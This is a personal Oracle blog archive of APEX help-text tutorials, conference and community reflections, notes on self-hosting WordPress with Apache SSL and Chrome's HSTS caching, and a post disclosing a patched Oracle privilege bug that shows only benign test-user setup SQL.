Mathias Magnusson

Changing the world, one line of code at a time

ODC Appreciation Day: Old Blog Posts

Thu, 2018-10-11 15:17

First of all, kudos to Tim Hall. This is one of the great times of the year, when all these thankful blog posts get published on a single day. If you read nothing else in the blogosphere all year, picking some of these would not be a bad choice.

Speaking of which, I will talk about being thankful for blogs in general. No, not the new posts explaining all the features we get in new versions. While those are fascinating and motivate me to play with new tech, they are not what makes blogs great.

What I think is great about blogs is old posts. Yes, there may be few things as unsexy as old, forgotten blog posts.

When there is an issue to resolve or a concept to get up to speed on, there are few things better than posts written a year or ten ago. But is not everyone an expert on everything once some time has passed? Nope, not even one person is a specialist on every facet of Oracle database technology.

Sometimes it is something one knows fairly well but where one needs to understand edge cases, others’ experiences, when not to use it, and so forth. Then a short Google session generates a reading list as good as any book.

A few examples follow of posts I have stumbled on that were not published this year but that provided great information and input. They are just the ones off the top of my mind when thinking back on such posts.

Tobias Arnhold wrote about the views provided by APEX. The post shows a SQL statement listing all the views and their hierarchical relationships. Not only was that useful, a side effect was that I realized these views were available at all and that the relationships could be found in the metadata. It is a post over six years old, the kind often thought of as long forgotten. Still very applicable. In fact, while Tobias may even have forgotten the post himself, it is even more applicable today, as a lot of views have been added to the ones available back in 2012.
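To give a flavor of the idea, here is a minimal sketch of such a query, assuming the APEX_DICTIONARY metadata view with its VIEW_NAME and PARENT_VIEW columns:

select lpad(' ', 2 * (level - 1)) || view_name as view_tree
from   (select distinct view_name, parent_view from apex_dictionary)
start with parent_view is null
connect by prior view_name = parent_view;

The lpad indentation makes the parent-child relationship between the views visible directly in the output.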

Another great one is Connor McDonald’s (@connor_mc_d) post from early 2016 on auditing row changes. It is a great collection of all the things provided to you so you can avoid hand-rolling auditing columns, tables, triggers, and so forth, including a complete test case and demo from start to finish. It is over two years old, but when needed it is a great place to start.

Then there are of course classics like Toon Koppelaars’ blog series The Helsinki Declaration (IT-Version). If you have not read the four posts it consists of, you owe it to yourself to do so. Go back to the beginning. It should be mandatory reading on how to build database-intensive applications.

I leave it at those to not extend this post more than necessary. But it shows the value of the combined effort of the community to write down small and big things as we come across them. There is immense value in those posts long after they have been written. Some are even more valuable a few years later, when the world and the technology have matured enough to make them mainstream.

#ThanksODC


Customized help text in APEX

Wed, 2018-05-09 07:00

Yes, I’m finally back. The last post was written right before a period of being completely offline that started before the post was even scheduled to be published. That was followed by a slow recovery. I have been fully recovered for a while but had not gotten back into things enough to find time to blog. That changes now. So what causes almost half a year of recovery time? Taking out the trash. Yes, it really is dangerous and should be avoided at all costs. What was really dangerous was the part where I fell and acquired a serious concussion. That was not made any better when I fell again a week later and got another severe concussion. I strongly advise against acquiring even mild concussions.

I’ll finish up this series about help texts with customized help text. The dedicated, in-line, modal, and non-modal variants I’ve covered have all been declarative. Now we’ll take a look at what can be done if we want to control not just how the help is shown to the user, but also how it looks.

For this blog I used version 5.1.4.00.08 of APEX on apex.oracle.com.

As I’ve stated before, my preferred way to deal with help text in APEX applications is inline help, as this blog post discussed. I have honestly never had to use this custom version in any real application. I imagine a lot can be done with just customizing CSS to make the help text show the way one wants. But for a customer that really wants to control this, this option may come in handy.

There is a procedure provided with APEX for this: APEX_APPLICATION.HELP. It has this signature (taken from the linked documentation).

p_request              IN VARCHAR2 DEFAULT NULL,
p_flow_id              IN VARCHAR2 DEFAULT NULL,
p_flow_step_id         IN VARCHAR2 DEFAULT NULL,
p_show_item_help       IN VARCHAR2 DEFAULT 'YES',
p_show_regions         IN VARCHAR2 DEFAULT 'YES',
p_before_page_html     IN VARCHAR2 DEFAULT '<p>',
p_after_page_html      IN VARCHAR2 DEFAULT NULL,
p_before_region_html   IN VARCHAR2 DEFAULT NULL,
p_after_region_html    IN VARCHAR2 DEFAULT '</td></tr></table></p>',
p_before_prompt_html   IN VARCHAR2 DEFAULT '<p><b>',
p_after_prompt_html    IN VARCHAR2 DEFAULT '</b></p>:&nbsp;',
p_before_item_html     IN VARCHAR2 DEFAULT NULL, 
p_after_item_html      IN VARCHAR2 DEFAULT NULL

p_request is not used.

p_flow_id and p_flow_step_id are the application id and page id, respectively.

p_show_item_help controls if help about individual items should be shown.

p_show_regions controls if information about each region should be shown.

The remaining parameters come in pairs, with one before and one after parameter of each kind. They control what HTML we want injected before or after a certain element on the page.

p_xxxxxx_page_html controls what is put before the page info and what is put after the whole help text (the page info is considered to include regions and items).

The remaining parameters are conditional, such that their content is ignored when the corresponding one of p_show_item_help and p_show_regions is set to something other than ‘YES’.

p_show_regions has to be YES for these to be considered:

  • p_before_region_html
  • p_after_region_html

They control what HTML to inject before and after each region help text.

p_show_item_help has to be YES for these to be considered:

  • p_before_prompt_html
  • p_after_prompt_html
  • p_before_item_html
  • p_after_item_html

The prompt ones control what is injected before and after the label for each page item. The item ones control what is injected before and after the actual help text for each item.
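Putting it together, a hedged sketch of a call, for example from a PL/SQL dynamic content region on a help page, could look like the following. The wrapper HTML values are made-up examples, and using :REQUEST as the page id assumes the page was linked with &APP_PAGE_ID. in the request, as in the earlier posts in this series.

begin
  apex_application.help(
    p_flow_id            => :APP_ID,   -- this application
    p_flow_step_id       => :REQUEST,  -- page id passed via the request
    p_show_item_help     => 'YES',
    p_show_regions       => 'YES',
    p_before_page_html   => '<div class="custom-help">',
    p_after_page_html    => '</div>',
    p_before_region_html => '<h2>',
    p_after_region_html  => '</h2>',
    p_before_prompt_html => '<p><strong>',
    p_after_prompt_html  => '</strong>: ',
    p_before_item_html   => '<span>',
    p_after_item_html    => '</span>');
end;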

Rather than describing how to build the whole thing, I recommend that you look at it in my demo application. The demo application allows you to play with all the above parameters and see the effect they have.

Watch it live

Take a minute and check out this live in my demo application to see for yourself how this can be used. Log in with demo/demo.

Help text as a modal dialog

Wed, 2018-01-03 04:00

To continue on the theme of help text in APEX, let’s take a look at showing it in a modal popup dialog in this post and then finish off the subject in the next post with customizing how help can be shown.


For completeness I’ll include a short section towards the end about how it works with a non-modal dialog too.

In the last post I showed how to display help text inline on a page, and in the one before that how to set up a specific page to be the landing page for showing help text for any page in the application. In this post I’ll show how to get help text displayed in a modal dialog.

For this blog I used version 5.1.4.00.08 of APEX on apex.oracle.com.

As I’ve stated before, my preferred way to deal with help text in APEX applications is inline help, as the last blog post discussed. But sometimes a dedicated page is preferable and sometimes a modal popup dialog is better. I think those might be preferred in cases where the help includes a lot of text and seeing the actual page at the same time is not needed, for example if the text explains a concept more than how to fill out the fields on the page.

We will set up another page with just a help region. We could make a copy of the page we created in the first post in this series, but to make this post more self-contained we’ll create the page from scratch.

Creating the modal help page

Create a new blank page (I’ll use 4 in this example). Choose the modal page type.

  • Add a “Help Text” region to the content body.
  • Name = Help
  • If you did not get the page created as modal, go to the page attributes.
    • Find the Appearance group.
    • Page type = Modal Dialog

This is identical to page 2 created in the post about help on a dedicated page, with just the page type changed to modal.

Create a button to show the modal help

We’ll first create a button to show the mechanics, simply because it is the easiest way to test. After that we’ll finish off access to help with a navigation bar entry, just as we did in the previous two posts.

Open the page from which you want to open the help. If you’ve followed along with the previous posts, it would be page 3. Any page for which you have some help text defined in the page attributes will do. That is needed just so we can see it work.

  • Add a text button to any region you have on the page.
  • Set the page to redirect to a page in this application
  • Set the page to be page 4
  • Open the advanced group in the popup
  • Request = &APP_PAGE_ID.
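As an aside, the button target above should correspond to a URL in APEX’s f?p syntax along these lines, where the positions are application:page:session:request, so the REQUEST slot carries the id of the page you want help for (4 being the modal help page):

f?p=&APP_ID.:4:&APP_SESSION.:&APP_PAGE_ID.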

Test the page and see that when you click the button you get a modal popup page with the help text for the page your button is on.

With this working we know the mechanics work; now we just need a navigation bar entry set up for it so it becomes available across the whole application.

Create a navigation bar entry

As before, we’ll finish off this version too with a navigation bar entry. It is by far the most natural way for a user to request help on a page, and it makes help available everywhere in the application.

Since the only real difference from the navigation bar entry for the dedicated page is whether the linked page is defined as a normal or modal page, this is pretty much a repeat of that setup.

Go to shared components and click on Navigation Bar List, and then on Desktop Navigation Bar. Click Create Entry and set:

  • Sequence = 50
  • List Entry Label = Modal Help
  • Target Type = Page in this Application
  • Page = Your modal help page (4)
  • Request = &APP_PAGE_ID.

If you run the application now you will see “Modal Help” up in the navigation bar, and clicking it has the same exact result as the button. It shows the help in a modal dialog by pulling up page 4 as a popup over the page you requested help from (3).

Now any new page you create for which you write help text will let the user click on the navigation bar and get the help text with no extra effort from you.

What about non modal?

Well, there is of course the option of a non-modal page type too. The result is a stand-alone window you can move around and keep referencing while navigating in the application.

To set it up we’ll just copy the page, button, and navigation bar entries.

Copy the page we created here (4) to a new one (5) and give it the name “Non Modal Help”; accept all other attributes and just click forward and create the page.

In page attributes:

  • Change the page type to  “Non-Modal Dialog”.
  • Set width to 700
  • Set height to 600

Go to your page in the application (3 if you have followed along) and copy the button “Modal”.

  • Name = “NonModal”.
  • Sequence = 80.
  • Target->Page = 5.

Test it to see your button creating a new window with the help text.

Go to the shared components -> Navigation Bar List -> Desktop Navigation Bar

  • Click copy icon on the right side for “Modal Help”
  • Display Sequence = 60
  • New List Entry Label = Non Modal Help
  • Click “Copy List Entry”
  • Click “Non Modal Help”
  • Set Target->Page = 5

Now you’ve got a non modal help option in the navigation bar too. Try it out.

Watch it live

Take a minute and check out this live in my demo application to see for yourself the effect of it before you build it yourself. Log in with demo/demo.

Help text in APEX in-line with page

Wed, 2017-12-27 04:00

Setting up help text in APEX is not hard but I often see it not done at all or implemented using regions with static content and then toggled on or off. That is unfortunate when there is declarative support for providing help texts.

In the last post I showed how to set up a specific page to be the landing page for showing help text for any page in the application. In this post I’ll show how to get help text displayed inline with the page the user is on.

For this blog I used version 5.1.4.00.08 of APEX on apex.oracle.com. The following has been the same since at least release 3.2 of APEX, though where and how you enter the needed properties may not be identical in previous and future releases. I don’t think it has changed much over the years.

Show help in-line

It is often preferable to see the help on the very page you want to understand. If it is on another page, like I showed in the last post, you often end up going there, reading a bit, and then going back to look, only to repeat that a number of times.

What if you could see the help on the page you’re on? Sometimes that is much better.

Setting up the global page

The basis for this is using the global page to have a help region available on every page in the application (unless you restrict it).

Create a global page if you do not have one in your application. Then add a “help text region” to the content body of the global page. Name it “Info” and give it a sequence of 0 to make sure it is the very first region in the content body.

If you run the application now, every page shows its own help text. So it is already working, but we want the user to choose when it is displayed.

We will use a page item to define when the help is shown and when it is not.

Creating the application item

Let’s create an application item “AI_SHOW_HELP” to let us control when help is shown.

Go to the shared objects:

  • Click on “Shared Components”.
  • Click on “Application Items”.
  • Click Create
  • Name = AI_SHOW_HELP
  • Session State Protection = Checksum Required – Session Level
  • Click Create Application Item

Set default value for AI_SHOW_HELP

To make sure the application shows with help not being displayed, we’ll set up an application computation to default the application item to N.

  • Click on “Shared Components”.
  • Click on “Application Computations”.
  • Click Create
  • Computation Item = AI_SHOW_HELP
  • Computation Point = On New Instance (New Session)
  • Computation Type = Static Assignment
  • Computation = N
  • Click Create Computation

Set a condition for when to show the help text region

With the application item in place and defaulting to not showing help, we just need to set a condition on the help text region on the global page so it only shows when AI_SHOW_HELP has the right value. To make sure it is only shown when we have requested it, we check for it being Y rather than just not being N.

  • Open the global page in the page designer (editing the page)
  • Click on the help text region (named Info above)
    • Scroll down to the Server-Side Condition group among the region’s properties
  • Type = “Item = Value”
  • Item = AI_SHOW_HELP
  • Value = Y
  • Click Save

If you now run the application, the help will no longer show on any of your pages. The reason is of course that we default AI_SHOW_HELP to “N” while only showing the help text when it is set to “Y” without any means to set it to “Y”.

What we need now is a way for the user to toggle AI_SHOW_HELP between “Y” and “N”.

Navigation bar entry to toggle help on or off

The way to create a toggle in the navigation bar is to have two entries and only show the one that reverses the current selection, i.e. if AI_SHOW_HELP is “Y” then let it be set to “N” and vice versa.

Head back to shared components and click on “Navigation Bar List”, and click on “Navigation Bar List” in the report to go to editing the entries in the navigation bar.

  • Click “Create Entry”
  • Sequence = 30
  • List Entry Label = Show Help
  • Target Type = Page in this Application
  • Target = &APP_PAGE_ID.
  • Set these items = AI_SHOW_HELP
  • With these values = Y
  • Conditions = Value of Item/Column in Expression 1 is != Expression 2
  • Expression 1 = AI_SHOW_HELP
  • Expression 2 = Y
  • Click Create List Entry
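For reference, the declarative entry above should translate into a link target in APEX’s f?p syntax along these lines, with the positions being app:page:session:request:debug:clearcache:items:values:

f?p=&APP_ID.:&APP_PAGE_ID.:&APP_SESSION.::::AI_SHOW_HELP:Y

That is, stay on the current page in the current session, and set AI_SHOW_HELP to Y as part of the navigation.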

Now we have a navigation bar entry (high up right where the logout link is) that toggles help on and that is only shown when help is not shown.

Run the application and click “Show Help” in the navigation bar to see the inline help become visible again. There is, as of yet, no means to turn the help off.

Now that it works we need to create one more entry that does the reverse. It is shown when help is visible to allow the user to hide the help again.

Return to the edit window and let’s set up the reverse of the navigation bar entry we just created.

The easy way to do it is to click the copy icon on the right side on the row for “Show Help”. Do that and enter the following values.

  • Sequence = 40
  • New List Entry Label = Hide Help
  • Click Copy List Entry

Now let’s edit the few things we need.

  • Click “Hide Help” in the report over navigation bar entries.
  • In Target section, set “With these values” = N
  • In Conditions, set “Expression 2” = N
  • Click Apply Changes

That is it: the application now has Show Help and Hide Help entries to toggle showing help about pages inline in the application. Note that it is an application-wide setting, so once on it remains active until the user turns it off. Thus, if you turn it on and move around in the application, the help will show on every page until you decide to turn it off.

Watch it live

As I said in the last post, I have set up a demo app I’ll use to show the effects when I blog about APEX things where it makes sense to have an app to show the feature. For the above, take a look at it. Log in with demo/demo.


Help text in APEX on a dedicated page

Wed, 2017-12-20 04:00

Setting up help text in APEX is not hard but I often see it not done at all or implemented using regions with static content and then toggled on or off. That is unfortunate when there is declarative support for providing help texts.

In this post I’ll show how to set up a specific page to be the landing page for showing help text for any page in the application. It is the precursor to the next post where I’ll take it a step further and show how to get help text displayed inline with a page the user is on.

For this blog I used version 5.1.4.00.08 of APEX on apex.oracle.com. The following has been the same since at least release 3.2 of APEX, though where and how you enter the needed properties may not be identical in previous and future releases. I don’t think it has changed much over the years.

Show help using another page

The following information is to a large extent a click-stream version of Oracle’s official documentation.

The numbers in parentheses are example page numbers, just to make sure there is no confusion about which page is referenced. They are the page numbers you’d end up with in a brand new application.

Set up two pages

Create a blank page (2) and then add a help text region to the content body of the page. This is the page that will be used to display the help for any page in the application.

Create another blank page (3) and scroll down to the bottom and fill in help text about the page in the “Help Text” property.

Help text location

Now that we have everything needed in place, we just have to add some means of navigation to get the help page (2) loaded with the help text of this page (3). Typically this is done with a link in the navigation bar, as we’ll see later, but it is often easier to first try out the navigation with a plain button.

Add Navigation

Add a button and label it OtherPage. Set the target to be the page number of the help page you just created (2). Set the request (in 5.1 under the advanced category) to “&APP_PAGE_ID.”.

Run the page (3) and click the button. You will be sent to your help page (2), where the help text you entered for the page (3) is shown.

If you add items on your page (3), the help text for those will also be shown on your help page. You will however not want to create a help button on every page in your application. It would both waste real estate on your pages and take time to set up on every single page.

Navigation bar

To make the help for every page in your application be displayed with no additional work per page other than writing the help text, let’s set up an entry on the navigation bar.

Go to shared components and click on Navigation Bar List, and then on Desktop Navigation Bar. Click Create Entry and set:

  • Sequence = 20
  • List Entry Label = Help Page
  • Target Type = Page in this Application
  • Page = Your help page (2)
  • Request = &APP_PAGE_ID.

[Screenshot: editing the navigation bar entry for the help page]

If you run the application now you will see “Help Page” up in the navigation bar, and clicking it has the same exact result as the button. It navigates to the help page (2) and shows the help text for your page (3).

Now any new page you create for which you write help text will let the user click on the navigation bar and get the help text with no extra effort from you.

Watch it live

I have just set up a demo app I’ll use to show the effects when I blog about APEX things where it makes sense to have an app to show the feature. For the above, take a look at it. Log in with demo/demo.


Database is the marquee feature again

Sun, 2017-10-01 17:37

So every year, before and during Oracle Open World, we all complain about how data and databases are brushed aside.

This year it is the feature. It is the one thing the big sign on Moscone West screams: “The Autonomous Database”.

Here is a picture showing it. It is all about database.

Every year there is talk about how Oracle needs to return to data and databases. Now that they do, I think we should be very happy even if we suspect the actual feature isn’t what we would have requested.

Any day Oracle talks about database is a day they’re not spending on forgetting it.

Spam killed

Sun, 2017-05-21 16:51

After I moved my blog to self-hosting, it attracted more and more spam. It started slow and very manageable. After my last blog post it got really bad. What started as a few spam messages a week culminated in 30-40 spam comments per day. At that point I had completely lost the ability to sort through it.

I was so disheartened by this that blogging didn’t happen, as I knew I had to solve this first. I thought solving it required paying for Akismet, and that annoyed me. I pay for my hosting and domain and so forth, but paying just to get rid of comments meant to abuse my blog felt wrong, especially as the blog does not have enough traffic to make paying for spam filtering feel reasonable.

I knew I had to do something this weekend, and after just a little bit of googling I had seen a few recommendations for Anti-Spam by Webvitaly. After reading up on it, it seemed like a very promising option. Since spam engines do not execute JavaScript, it places a hidden field on the comment form and then populates it with the correct answer when someone submits a comment; the spam engines put no or bad data in it, so their comments are just ignored.

After installing it 36 hours ago, it has filtered out 60 comments and not let through a single spam comment. I’d say it does the trick for what I need. I can go back to blogging about Oracle and other technologies I fancy, instead of being forced to deal with spam comments.

If you need to filter spam without even having to review it, then based on my experience so far I’d definitely recommend looking at this plug-in.

Speaking at DOAG and RMOUG rocked

Tue, 2017-03-14 04:50

As I wrote a while back I was accepted to speak both at the User Group Leader summit at DOAG16 and at RMOUG Training Days.

The first one was a short presentation where I talked about a large bug in Oracle security and the need to patch and upgrade to not have that exposure. It was great fun as it was limited to a four-minute talk. I learned a lot from preparing for it as that short time allows for no questions and no spur of the moment comments. Each slide has to be carefully timed to make sure the time is enough for all slides.

The second one was about a customer case where a severe performance issue was handled; I talked about all the assumptions we challenged in the process of resolving it. The job took 36 hours when it could only be allowed 8, and the amount of work was soon expected to double. It ended up taking just a few minutes when we were done. Part regular tuning and part using the “magic” of the EXADATA.

While the talk ended up having few attendees – competing with Maria Colgan and Graham Wood is tough – it was a great experience. I have not presented at a conference this big before. Training Days is also a conference that scares me to present at. I used to live in Denver, and my respect for the conference, the presenters, and the quality expected is almost at an unhealthy level. So being there to present was a way to slay a dragon of mine. I had a great time at the conference and I enjoyed presenting. Even though I did not have an oversubscribed room, those who came seem to have enjoyed the session, as I was rewarded with a 9.0 rating for the talk.

If you’re thinking about maybe going to Training Days next year, my advice is to do it. It is a great conference and it is extremely well-organized. It is small enough that you learn the layout and the rooms fast, while still being big enough to have a lot of great talks to choose from in every slot. There were several slots where I wanted to go to three sessions, and I still regret having missed the ones where 2-3 fantastic sessions were held at the same time.

I really liked the effort made to make the biggest names available and approachable by giving them their own tables at lunchtime and letting people sit at the table of one of the persons they respect the most. I really enjoyed my lunch at Cary Millsap’s table. It was a great group and a very inspiring discussion about performance, revisiting old battles in the field.

It is far away, but I’ll be back. I had a blast.

Signing up for scary stuff

Sun, 2016-11-06 15:03

So I subscribe to the idea that the only way to improve is to dive in at the deep end. Sink or swim.

With that in mind I sent in an abstract to RMOUG and actually got it accepted. Now, this is a conference I used to attend every year when I lived in Denver. I know the quality they have in most presentations and I know that lots of people with “important” names in the community attend. I have to up my game and give myself a chance to be embarrassed. It scares and motivates me in equal amounts.

Talking about that feeling: I watched the quick presentations at OOW 2016 – “EOUC Database ACES Share Their Favorite Database Things”. I was impressed by how they managed to keep those presentations to just five minutes and still get a great message across. I figured that would be a great thing to practice. I’m going to the DOAG conference in a week, and before it starts there is a day for user group leaders. I’ll attend that, and on the agenda there is a 30-minute slot with 4-minute presentations. Even less than they gave the ACED presenters at OOW. Not really knowing what I was getting myself into, I tossed my name into that ring also.

Hopefully I get to make a try at that too. There will be just a few days of prep. Maybe that is just as well so I do not find time to chicken out. Standing in front of all the group leaders in Europe with just a couple of evenings to prep will be nerve-wracking. But again, if one wants to improve, one has to test those wings.

Hopefully I’ll get through those without too many scars. I look forward tremendously to both conferences, for the meetings as well as for the chance to possibly present at both.

OTN Appreciation Day – The Community

Tue, 2016-10-11 07:00

So this is my post about my favorite feature of my favorite product. I can hear a lot of you say, “The community is not a feature of the database or any other product!”

That may be your opinion; I think it is the greatest feature of them all. I’d say that the mostly friendly Oracle community is by far the most important driver for quality solutions. I know I have learned, and still learn, more from the community than from any manual.

I began using Oracle AskTom back when I started with Oracle. Tom was nice enough to start it up just months before I joined the fun in the Oracle world. From there I started finding all the amazing blogs that let me dig deeper and deeper into the database. Part of finding that community was finding great presenters at the Training Days that RMOUG holds every year. Those two days used to be the professional highlight of the year while I was based in Denver, CO.

My manager at the time used to comment that where she and others just saw a technology, I referred to the community over and over. That is how I see it: when people talk about Oracle, I think about the company and the community first and about the specific technology after that.

That is still the case, to the point where I today try to create a community where one is missing. That one is just a very small piece in the bigger worldwide community of Oracle professionals. The user group scene is one of the greatest opportunities available to learn more and to get a chance to share the knowledge one happens to pick up.

Not only is taking part in the community one of the greatest opportunities available to learn critical skills in the technology you focus on, presenting on a thing you think you know forces you to learn even more about it. It is also a great way to start building a network of others who enjoy sharing and debating technical aspects of Oracle technologies.

Another part of the community is OTN, which sponsors a large part of the things that make the community “one” community. Things like the ACE program, which awards some of the best in the community the ACE title for their ability to share and educate. The ability for user groups to have ACE Directors visit and hold a couple of presentations is a fantastic thing for every member of a user group.

Going to conferences, and getting the chance to present at them, is one of the things I enjoy the most. That is when you really feel the power of the community. I feel we have too little of it in Sweden, so seeing and feeling how great it is in other places provides a lot of motivation to bring people together in one here.

If you are not feeling part of the user group community, sign up with your local user group. Start reading blogs, get on Twitter, and start following some of the greats. From there you’ll find more and more interesting sites, people, and blogs to follow.

I’ll refrain from name-dropping the guys and gals I follow. If you know me, you’ll know who they are anyway. If not, search for your favorite topics within Oracle on Twitter, or google them followed by “twitter” or some other social network name, and you’ll find lots of twitterites and bloggers writing about the stuff that inspires you.

If you still want a list of where to start, hit me up and I’ll get you a good starting point from where to expand your horizons.

Getting from http to https

Sun, 2016-09-11 13:02

The world is moving to https, but that was not the reason for the move.

Initially I was happy to use whatever Digital Ocean (DO) supplied in the WordPress droplet. But as I explained in my last post, I had some problems with moving from wordpress.com to my self-hosted site at DO.

In short, the problem turned out to be Chrome caching sites that accept https, making my site unavailable to every visitor who had been to my site in the past, including myself. It seemed like DO forced https but had not configured the droplet fully. That was not the case at all; it was configured for http but not for https, and setting that up was well documented.

Had I understood that, and what happened, from the beginning it would have made this so much easier, but I only realized what Chrome did a couple of minutes after troubleshooting and fixing what I thought was a half-baked config. It would have saved me from spinning up about five extra droplets and reading a lot more about Apache2 than I really needed to. However, I learned a lot, so it was good that I mistook what happened for being something the droplet did.

To make it work I started with performing the initial server setup they recommend. Most of it was things I knew I ought to do anyway, so it made sense, but the real reason was that the https post they refer to lists it as the initial step. So I followed it just to make sure I did not miss a required step.

Then I ran the following commands to make Apache load SSL and configure a virtual host for it.

# Link in the SSL module and its config so Apache loads them
cd /etc/apache2/mods-enabled
ln -s ../mods-available/ssl.conf
ln -s ../mods-available/ssl.load
ln -s ../mods-available/socache_shmcb.load
# Enable the default SSL virtual host
cd /etc/apache2/sites-enabled
ln -s ../sites-available/default-ssl.conf

In hindsight I’ve realized that the proper way to enable the modules would have been to just do “a2enmod ssl”. However, I have not tried that in a fresh droplet, so I leave it here just as a suggestion.
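For the record, that suggestion would look something like the sketch below. I have not verified it in a fresh droplet, so treat it as an untested assumption rather than a recipe.

# Untested suggestion: let Debian's helper scripts create the links above
a2enmod ssl        # should also pull in dependencies such as socache_shmcb
a2ensite default-ssl
service apache2 restart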

All that remains now is to use yet another fantastic writeup DO provides. It shows how to create a free SSL certificate using Let’s Encrypt and configure Apache to use it, including how to make it renew automatically. It is easy and fast, and works with no complications at all. At least it did for me.

In addition to Digital Ocean, which I find extremely impressive, Let’s Encrypt is by far one of the most impressive services I’ve found recently that I never knew existed. I recommend everyone go there and read up on what they do and how it works.

Full disclosure: The links to Digital Ocean (DO) in this article use my referral link. Using it I get a discount from them, and so do you. I had this post planned before I happened to get a referral id the other day; they are quite honestly one of the most impressive destinations for IT geeks I can think of. Go check them out using my referral, or just enter digitalocean.com into your favorite web browser (that link is referral-free – use the other to save money).

Moving to selfhosted and failing hard

Mon, 2016-09-05 01:05

I had decided to move one of my blogs to a self-hosted model to get more control over plugins and other things. After reading up a bit on different vendors I found Digital Ocean to be my choice. What’s not to like about a place that can spin up a complete Linux with WordPress installed and ready for me to use? Yes, it only takes them seconds and it is powered by SSD. Add that it costs $10 per month ready to go, and that for $2 a month they include a preconfigured weekly backup. Seeing this and knowing it is lightning fast, I could not think of a reason to try someone else.

So I took my domain “mathiasmagnusson.com”, which has just a couple of pages and no blog posts. All blogging is done on subdomains of it. This should be easy and let me test the move without interrupting the other blogs, right? It was easy: I imported the site from wordpress.com, set a new theme, and made a few different tweaks. Accessing it by IP address worked great; it was everything it used to be and looked better. Yes, that is probably because it wasn’t a piece of art before the move (either).

Now all that was left was to point the DNS A-record to my new place. Or so I thought. I started with pointing the DNS there using local name resolution (/etc/hosts) and a made-up name “mywp”, and it worked perfectly, even after changing the site name in WordPress so all pages were linked using mywp instead of the IP. Time to change GoDaddy to point to the IP of my new site. After doing that, the site worked on IP but failed on access by name. It reloaded using https and I got a connection refused message. As the tab showed the WordPress logo, I concluded that it must be WordPress sending back a redirect on http when accessed with a public name.

I started a service ticket with Digital Ocean, and we got to over 15 replies over the weekend, with them doing their best to get more and more info from me on why I thought it was their server acting up, and me trying as hard as I could to prove what was self-evident to me: of course it had to be their server or network; it was a connection refused and a reload with https. Nothing else in the chain would do that.

At this point I spun up server after server, proving to myself that this could be reproduced without doing anything more than getting the server created and then using local name resolution. At the same time I did a deep dive into the WordPress code, reading up on SSL, certificates, and how it should work. I found that it has snake-oil certs installed, and it really seemed like the https stuff was half-baked, but then why isn’t the Internet littered with posts about it? While I dug into the SSL stuff, the discussion on why it even happens continued. I will explain that first and get to what I learned and did with SSL later.

It turns out that Chrome has a cache of sites/pages you have visited before that were serving https at the time, and it silently rewrites all such page requests to https for you. Normally this is a great function. But when you move from a place that used https (wordpress.com) to one that does not, like my new site, it makes all accesses to pre-existing pages fail. The exact opposite of what one wants; the intent is to make such a move transparent to all visitors.

Chrome even has a function to add sites/pages to the cache so you can try breaking things for yourself. Should you have this problem or want to play with this, go to chrome://net-internals/#hsts and add or remove entries. If you encounter the issue with automatic rewrites by Chrome, you want to remove the site here.

There is a feature meant to help, in that it lets a site tell Chrome to always enforce https for it. That is a good thing, until the site moves while keeping the same exact name. Then it can make every reader of your site/blog unable to read it. Thus, moving from an https-capable site that uses HSTS – HTTP Strict Transport Security – to one only capable of http can make your readers lose access completely if they are not aware of this, and most of them will not be.

This has become a very long post now, so the explanation for how I got my site https-capable will be written up in its own post.

Hello world!

Sun, 2016-09-04 14:14

Welcome to mathiasmagnusson Sites. This is your first post. Edit or delete it, then start blogging!

An old dog learns a new trick

Mon, 2016-02-29 05:00

Reports of this blog’s death have been greatly exaggerated. It has been very quiet here, though, while I worked on getting the Swedish part of Miracle started. It is now rocking the Stockholm market, so it’s time to get back into more geeky stuff.

Talking of which: I have encountered Liquibase for database versioning time after time and always come to the conclusion that it is not what a DBA wants to use. I recently took it out for a spin to prove once and for all that it is not capable of what real DBAs need.

Well, let’s just say that it did not end like I expected. The phrase “an old dog learns a new trick” comes to mind. Once I got over the idea that it is the DDL I have to protect, I realised that what I need is rather control over how changes occur. In fact I get all the control I need, and problems such as being able to back out changes and adapting to different kinds of environments and/or database types are easily handled.

Do take it out for a spin, you’ll like it.
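To give a flavor of what that control looks like, here is a minimal sketch of Liquibase’s SQL-formatted changelog style, with made-up table and changeset names:

--liquibase formatted sql

--changeset mathias:1
create table demo_log (
  id   number       not null,
  msg  varchar2(50) not null
);
--rollback drop table demo_log;

--changeset mathias:2 context:test
insert into demo_log (id, msg) values (1, 'only loaded in test environments');
--rollback delete from demo_log where id = 1;

Each changeset carries its own rollback, and the context attribute is one way to adapt what runs in different kinds of environments.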

If you read Swedish, I wrote a document with a full demo of lots of the features. You find it here. It is a long document, partly because it has a long appendix with a changelog and partly because I step through each change (of 37) and explain them.

I also show how APEX applications can be installed with Liquibase. This is often said not to work – that you have to do it by hand with APEX. Well, not only is it possible, it is easy.

I’d translate the demo and the document to English if that would be useful to many people. Let me know if this sounds like a document you’d like to see in English.


Is your database secure? Are you sure? Are you *really* sure?

Wed, 2014-06-18 08:47

A friend, and at the time co-worker, at Kentor AB found this bug. He had the tenacity to track it down and prove that it was a bug, and not just a flaw in the logging mechanism where it first appeared to occur.

Today is the day when I can finally speak about a bug I asked for a peer review on over a year ago. I had to pull that blog post offline when it became clear that we had indeed found what I think is a monster bug. It was difficult to fix, so while it was quiet online about the bug, Oracle was hard at work fixing it. In fact it turned out to be two different bugs, each plugged separately.

Before we get to the meat of the issue, have you applied the January 2014 CPU? No? OK, we’ll wait while you take care of that. Trust me, you want to have it installed. Back already? Good. Patching really doesn’t take too long. :-)

I’ve spent a number of years trying to very diligently apply the correct grants for different users to make sure every user had just what they needed. It turns out it was a wasted effort. Had the users known about this bug, they could have circumvented their lack of access. Truth be told, I really have no idea if someone did. In fact the bug was such that it was abused in production at a large Oracle shop by mistake. This bug is present in all versions of the database (as far as we know) and it has been fixed with the latest CPU for 11g and 12c. If you run on an older version, you should upgrade now! Running older than 11 at this point probably means you’re not reading blogs about databases anyway.

So what exactly is the bug then? In short, you can update data in tables you only have select rights on. How can that be? You’ve tested that multiple times. True, the SQL has to be written in a pretty specific way to trigger the bug. In a database that is a base install, or at least predates the January CPU, the following test case should prove the issue. You can use most of this to verify the problem; you will probably not want to test the privilege escalation in a production system though.

Let us first create some users for our test.

drop user usra cascade;
create user usra identified by usra default tablespace users;
alter user usra quota unlimited on users;
grant connect to usra;
grant create table to usra;
--
drop user usrb cascade;
create user usrb identified by usrb;
grant connect to usrb;
grant create view to usrb;
--
drop user usrc cascade;
create user usrc identified by usrc;
grant connect to usrc;
grant select any dictionary to usrc;

We create a user usra that can create tables, usrb that can create views and usrc that can only select from the dictionary. These users will allow us to test the different versions of this bug in a controlled fashion.

